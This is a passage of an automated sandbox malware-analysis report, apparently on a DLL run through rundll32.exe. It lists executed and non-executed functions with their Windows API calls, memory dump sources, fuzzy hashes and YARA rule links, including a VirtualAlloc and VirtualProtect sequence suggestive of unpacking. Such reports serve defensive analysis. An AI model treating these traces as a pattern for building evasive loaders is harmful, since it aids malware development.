                                                                                                            • lstrlenW.KERNEL32(030350AD,?,030350AD,004F0053,05319364,?,?,?,?,?,?,030354EF), ref: 03031335
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • memcpy.NTDLL(00000000,004F0053,747869A0,?,?,030350AD,004F0053,05319364,?,?,?,?,?,?,030354EF), ref: 03031355
                                                                                                            • memcpy.NTDLL(747869A0,030350AD,00000002,00000000,004F0053,747869A0,?,?,030350AD,004F0053,05319364), ref: 03031368
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 2411391700-0
                                                                                                            • Opcode ID: 5011e56f5f29a731942f0a6b5b766f0fe597b501fc3dcf88d0e361aaab4564aa
                                                                                                            • Instruction ID: be6bfef6278a0c7f5a4b29ec0f9d00fb4d877852c5657d5979642293fc4cd5f4
                                                                                                            • Opcode Fuzzy Hash: 5011e56f5f29a731942f0a6b5b766f0fe597b501fc3dcf88d0e361aaab4564aa
                                                                                                            • Instruction Fuzzy Hash: 4FF0497A902118BBCF15EFA9CC84CCF7BACEF4A2947054462FD04DB201E631EA108BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 030338CA, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlen.KERNEL32(05319B10,00000000,00000000,770CC740,0303467E,00000000), ref: 030338DA
                                                                                                            • lstrlen.KERNEL32(?), ref: 030338E2
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • lstrcpy.KERNEL32(00000000,05319B10), ref: 030338F6
                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 03033901
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 74227042-0
                                                                                                            • Opcode ID: f16ad0dd5b9a47f101d36696db461b5d80842db8ea676d7467b288832a28b208
                                                                                                            • Instruction ID: a6c284412b574a5cbfa68e5f98f218d3f5eae873abcc946478415a33b59e6f8b
                                                                                                            • Opcode Fuzzy Hash: f16ad0dd5b9a47f101d36696db461b5d80842db8ea676d7467b288832a28b208
                                                                                                            • Instruction Fuzzy Hash: 0FE09277503260A78711EBE8AC48C9BBBACEF8A6503040416F600E3104C728D8018BA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Analysis Process: rundll32.exe PID: 6284 Parent PID: 3272 rundll32.exeCOMMON

                                                                                                            Executed Functions

                                                                                                            Function 6F0DDFDA, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNELBASE(00000000,000008C9,00003000,00000040,000008C9,6F0DDA28), ref: 6F0DE097
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6F0DDA88), ref: 6F0DE0CE
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6F0DE12E
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F0DE164
                                                                                                            • VirtualProtect.KERNEL32(6F030000,00000000,00000004,6F0DDFB9), ref: 6F0DE269
                                                                                                            • VirtualProtect.KERNEL32(6F030000,00001000,00000004,6F0DDFB9), ref: 6F0DE290
                                                                                                            • VirtualProtect.KERNEL32(00000000,?,00000002,6F0DDFB9), ref: 6F0DE35D
                                                                                                            • VirtualProtect.KERNEL32(00000000,?,00000002,6F0DDFB9,?), ref: 6F0DE3B3
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F0DE3CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.633457637.000000006F0DD000.00000040.00020000.sdmp, Offset: 6F0DD000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$Protect$Alloc$Free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2574235972-0
                                                                                                            • Opcode ID: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                            • Instruction ID: 2512d9ebc86b1d5572e1fe27dd23102369d4e81253cfc23d2c29ea2b3eba83e7
                                                                                                            • Opcode Fuzzy Hash: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                            • Instruction Fuzzy Hash: 62D158726206209FDB12CF18CD80B5677E7EF48B92F0841A5ED4A9F35AD770BA41CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F045600, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 623COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6F045696
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,6F0DB7A0,000008BB), ref: 6F04576F
                                                                                                              • Part of subcall function 6F0472B0: task.LIBCPMTD ref: 6F047352
                                                                                                              • Part of subcall function 6F04BA20: swap.LIBCPMTD ref: 6F04BA39
                                                                                                            • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6F0C7144,?,?,?,?,?,00000000), ref: 6F045950
                                                                                                            • std::locale::locale.LIBCPMTD ref: 6F0459D8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                            • String ID: ?
                                                                                                            • API String ID: 756721536-1684325040
                                                                                                            • Opcode ID: 80f1fa31fab8db82761f2dd60790cbfbb4312e20bb01cc056dde5a4f9ee2e9d0
                                                                                                            • Instruction ID: 2f6f9adb6c59c61e1ddf97a80f01413311ca98bf2b66b52aad743d6f9d658509
                                                                                                            • Opcode Fuzzy Hash: 80f1fa31fab8db82761f2dd60790cbfbb4312e20bb01cc056dde5a4f9ee2e9d0
                                                                                                            • Instruction Fuzzy Hash: A8522FB1D00616CFCB08DF69DD90BA9BBB2FB4A314F208129D90597396D7385859EF48
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F04C1E0, Relevance: 6.8, APIs: 1, Strings: 2, Instructions: 1543COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,6F0DC338,000008BB), ref: 6F04D345
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName
                                                                                                            • String ID: 1$N
                                                                                                            • API String ID: 514040917-3127171972
                                                                                                            • Opcode ID: 8fd51f56f40f147cd04247e15d4ff0eeeac1c356db84feff344070ed4a42ac0e
                                                                                                            • Instruction ID: 145c3df08cd0ec8d591a1cf2ed114b003f68e25b2a4aeac651a5d9991316f75b
                                                                                                            • Opcode Fuzzy Hash: 8fd51f56f40f147cd04247e15d4ff0eeeac1c356db84feff344070ed4a42ac0e
                                                                                                            • Instruction Fuzzy Hash: C4035E71904952CECB08CF69CE907787FF2FB57325B24816ADD458728BE33955A8EB08
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09146E, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,6F0DA0D4,00000000), ref: 6F0914AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 3bdbbbb922a4d72496aa8c277c75cfbc11930e54c4ef02e0cfe0f89890733d3e
                                                                                                            • Instruction ID: 102dfec6744d56ac5575113623db97253016d7f2ccc805435d2adfd98f5a0dc4
                                                                                                            • Opcode Fuzzy Hash: 3bdbbbb922a4d72496aa8c277c75cfbc11930e54c4ef02e0cfe0f89890733d3e
                                                                                                            • Instruction Fuzzy Hash: B1F0E931789A2456EB119A768804F9F37DDAF4A770B119262EC28DB1C0EB34E801A6E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F055C56, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlEncodePointer.NTDLL(?), ref: 6F055C69
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: EncodePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2118026453-0
                                                                                                            • Opcode ID: 2ebb6d7158f1e18b6a3771e2059e40d700e2a90f63e9c6a96261b371881faa7b
                                                                                                            • Instruction ID: 18d34cb1b9aa7f214233c6aead2b22566878d65c0e47463362096e6cac607536
                                                                                                            • Opcode Fuzzy Hash: 2ebb6d7158f1e18b6a3771e2059e40d700e2a90f63e9c6a96261b371881faa7b
                                                                                                            • Instruction Fuzzy Hash: 26D092B0008E199BDF049F44EC047643FB4F706376F604229E81D83296D7315470EA44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 6F09E84C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,jo,00000002,00000000,?,?,?,6F09EB6A,?,00000000), ref: 6F09E8E5
                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,jo,00000002,00000000,?,?,?,6F09EB6A,?,00000000), ref: 6F09E90E
                                                                                                            • GetACP.KERNEL32(?,?,6F09EB6A,?,00000000), ref: 6F09E923
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: ACP$OCP$jo
                                                                                                            • API String ID: 2299586839-1723675111
                                                                                                            • Opcode ID: 51c8729580726fbee3e22a5440746d16e0bdc1fc14cb016e65875fa6e3f5022c
                                                                                                            • Instruction ID: b9038b26e503fdf3372fd5dba6b1beb4a290d0c80aad08930d05b0c569eee49d
                                                                                                            • Opcode Fuzzy Hash: 51c8729580726fbee3e22a5440746d16e0bdc1fc14cb016e65875fa6e3f5022c
                                                                                                            • Instruction Fuzzy Hash: FC21B322A04205A6E7248BA8C901B8B77F7FF45B64B569525EA1DDB241F732ED40E3B0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09E0A2, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,6F0925B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6F09E163
                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6F0925B5,?,?,?,00000055,?,-00000050,?,?), ref: 6F09E18E
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 6F09E222
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 6F09E230
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6F09E2F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                            • String ID:
                                                                                                            • API String ID: 4147378913-0
                                                                                                            • Opcode ID: f5c60cc61911608f52f9e14ce493f9329e64f682b7e2d6fe73ffed1cfda6bb5a
                                                                                                            • Instruction ID: 7d94eda82526b67a6a9a647f4f0cb3aedd7e4f5a96d6fa77c282a6fd0cf40f51
                                                                                                            • Opcode Fuzzy Hash: f5c60cc61911608f52f9e14ce493f9329e64f682b7e2d6fe73ffed1cfda6bb5a
                                                                                                            • Instruction Fuzzy Hash: DC71FF71A04706AAEB15AB74CC45FAA73E8FF45714F00642AEA19DB1C0FB74ED40A7B0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09EA21, Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                              • Part of subcall function 6F08F299: _free.LIBCMT ref: 6F08F2FB
                                                                                                              • Part of subcall function 6F08F299: _free.LIBCMT ref: 6F08F331
                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6F09EB2D
                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 6F09EB76
                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 6F09EB85
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6F09EBCD
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6F09EBEC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 949163717-0
                                                                                                            • Opcode ID: 057f518d5d8160680a9422fd9c388a3f9a5342eeb9dbfc4036b79decfd537a7a
                                                                                                            • Instruction ID: f7c5c2cede04a5099c9d5b96f66da20424d4ed8fbe69b65b7d2ef50b0a75e124
                                                                                                            • Opcode Fuzzy Hash: 057f518d5d8160680a9422fd9c388a3f9a5342eeb9dbfc4036b79decfd537a7a
                                                                                                            • Instruction Fuzzy Hash: 5F515A71A0060AEAEF00DFA5CC44BAFB7B8BF09305F04556AE925E7191F770A940AB71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F066CAF, Relevance: 24.3, APIs: 16, Instructions: 287COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 1918051841-0
                                                                                                            • Opcode ID: 4994eb03090cc7b491e1af23c8dbdf7622292d28f03a77a5e05c979a46f592c3
                                                                                                            • Instruction ID: b88f8a9b62268b91310e837935197862e9c1f3f2e6417438e6ac06688119bf8d
                                                                                                            • Opcode Fuzzy Hash: 4994eb03090cc7b491e1af23c8dbdf7622292d28f03a77a5e05c979a46f592c3
                                                                                                            • Instruction Fuzzy Hash: 3D91F670E05325AAEB246BB58E41B7F7AE9DF47754F10452DF808AF2C1EB748D1087A2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F056FA7, Relevance: 21.1, APIs: 14, Instructions: 98COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F056FAE
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F056FB8
                                                                                                            • int.LIBCPMT ref: 6F056FCF
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • codecvt.LIBCPMT ref: 6F056FF2
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057009
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057029
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057036
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057043
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05704D
                                                                                                            • int.LIBCPMT ref: 6F057064
                                                                                                            • collate.LIBCPMT ref: 6F057087
                                                                                                              • Part of subcall function 6F059346: __EH_prolog3_GS.LIBCMT ref: 6F05934D
                                                                                                              • Part of subcall function 6F059346: __Getcoll.LIBCPMT ref: 6F0593B1
                                                                                                              • Part of subcall function 6F059346: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6F0593CD
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05709E
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0570BE
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0570CB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register$GetcollH_prolog3_LocinfoLocinfo::~_codecvtcollate
                                                                                                            • String ID:
                                                                                                            • API String ID: 348717968-0
                                                                                                            • Opcode ID: fcb8fd97ec4838597d9f24639ce041d2e3adc3c2884eaa1d4efb0261d0dfebf2
                                                                                                            • Instruction ID: 0567ab872b2f459b1c93f3a0c6a4def48b6ad9c1aa99bd64264086ff51dc8f84
                                                                                                            • Opcode Fuzzy Hash: fcb8fd97ec4838597d9f24639ce041d2e3adc3c2884eaa1d4efb0261d0dfebf2
                                                                                                            • Instruction Fuzzy Hash: F331E831900629DBCF05EBA0CB44BBEB7B2BF45368F244509D415AB3C1DFB19A26D791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0571FB, Relevance: 21.1, APIs: 14, Instructions: 98COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057202
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05720C
                                                                                                            • int.LIBCPMT ref: 6F057223
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • ctype.LIBCPMT ref: 6F057246
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05725D
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F05727D
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05728A
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057297
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0572A1
                                                                                                            • int.LIBCPMT ref: 6F0572B8
                                                                                                            • messages.LIBCPMT ref: 6F0572DB
                                                                                                              • Part of subcall function 6F05956A: __EH_prolog3.LIBCMT ref: 6F059571
                                                                                                              • Part of subcall function 6F05956A: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6F0595C4
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0572F2
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057312
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05731F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register$LocinfoLocinfo::~_ctypemessages
                                                                                                            • String ID:
                                                                                                            • API String ID: 4204488167-0
                                                                                                            • Opcode ID: 8ed9785a3e1acaf54022047454177db53600ce7ee651be0740d694236d8d28c9
                                                                                                            • Instruction ID: 5e7bd4671a8789461e72c254b01d89b03ad6a52fa072df9c967bfd33e07b1e75
                                                                                                            • Opcode Fuzzy Hash: 8ed9785a3e1acaf54022047454177db53600ce7ee651be0740d694236d8d28c9
                                                                                                            • Instruction Fuzzy Hash: A8310471900629DBCF05DBA4CB44BBD77B2BF85328F244409E8156B2C0DFB4AA66DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0570D1, Relevance: 21.1, APIs: 14, Instructions: 98COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0570D8
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0570E2
                                                                                                            • int.LIBCPMT ref: 6F0570F9
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • collate.LIBCPMT ref: 6F05711C
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057133
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057153
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057160
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05716D
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057177
                                                                                                            • int.LIBCPMT ref: 6F05718E
                                                                                                            • ctype.LIBCPMT ref: 6F0571B1
                                                                                                              • Part of subcall function 6F05948A: __EH_prolog3.LIBCMT ref: 6F059491
                                                                                                              • Part of subcall function 6F05948A: ctype.LIBCPMT ref: 6F0594D9
                                                                                                              • Part of subcall function 6F05948A: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6F0594EC
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0571C8
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0571E8
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0571F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registerctype$LocinfoLocinfo::~_collate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1155191899-0
                                                                                                            • Opcode ID: 7e860cf633b33dd0f444a1cd642efd8646fce3f4ce9e84d0f452b28f1eb00303
                                                                                                            • Instruction ID: 2f72e041aee307a6076b498478f4be20d87e284630c67d0a486b8e62b2703009
                                                                                                            • Opcode Fuzzy Hash: 7e860cf633b33dd0f444a1cd642efd8646fce3f4ce9e84d0f452b28f1eb00303
                                                                                                            • Instruction Fuzzy Hash: 8F31D631900629DBCF05DBB4CB44BADB7B2BF85728F244509D4106B3C0DFB4AA26DB95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09B2A4, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ___free_lconv_mon.LIBCMT ref: 6F09B2E8
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA15
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA27
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA39
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA4B
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA5D
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA6F
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA81
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA93
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAA5
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAB7
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAC9
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CADB
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAED
                                                                                                            • _free.LIBCMT ref: 6F09B2DD
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09B2FF
                                                                                                            • _free.LIBCMT ref: 6F09B314
                                                                                                            • _free.LIBCMT ref: 6F09B31F
                                                                                                            • _free.LIBCMT ref: 6F09B341
                                                                                                            • _free.LIBCMT ref: 6F09B354
                                                                                                            • _free.LIBCMT ref: 6F09B362
                                                                                                            • _free.LIBCMT ref: 6F09B36D
                                                                                                            • _free.LIBCMT ref: 6F09B3A5
                                                                                                            • _free.LIBCMT ref: 6F09B3AC
                                                                                                            • _free.LIBCMT ref: 6F09B3C9
                                                                                                            • _free.LIBCMT ref: 6F09B3E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                            • String ID:
                                                                                                            • API String ID: 161543041-0
                                                                                                            • Opcode ID: 470744bdfdf01437a282fe4940c7cf31b79590a7af01519aebf5157f1fb0f870
                                                                                                            • Instruction ID: 3f9fa70ca20f02cb9c3e7a39182d44f9e0c1c8e6995c2c591b584dee4214acfc
                                                                                                            • Opcode Fuzzy Hash: 470744bdfdf01437a282fe4940c7cf31b79590a7af01519aebf5157f1fb0f870
                                                                                                            • Instruction Fuzzy Hash: 693139B16047019FEB118B39DA40BDA73E9AF04324F54A42AE465DB191EF30FA81EB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0577CD, Relevance: 19.6, APIs: 13, Instructions: 98COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0577D4
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0577DE
                                                                                                            • int.LIBCPMT ref: 6F0577F5
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F057818
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05782F
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F05784F
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05785C
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057869
